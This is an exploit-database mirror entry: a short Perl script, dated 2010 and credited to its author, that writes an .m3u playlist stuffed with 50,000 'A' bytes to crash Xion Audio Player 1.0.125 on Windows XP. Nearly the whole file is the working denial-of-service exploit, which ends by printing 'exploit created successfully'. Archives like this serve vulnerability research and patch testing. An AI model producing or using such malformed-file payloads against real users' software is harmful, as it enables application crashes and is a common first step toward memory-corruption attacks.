exploit-db-mirror/exploits/windows/dos/14517.pl
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

21 lines
No EOL
534 B
Perl
Executable file

#!/usr/bin/perl
# Xion Audio Player version: 1.0.125
# Author: hadji samir , s-dz@hotmail.fr
# Download : http://xion.r2.com.au/index.php?page=download
# Tested : Windows XP SP2 (fr)
# DATE : 2010-07-31
#
# thanks mo3taz wnass cfa nta3 blida
#
# et samir tjrs mahboul-3lik
#
###################################################################
my $file= "mahboul-3lik00.m3u";
my $junk= "\x41" x 50000;
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");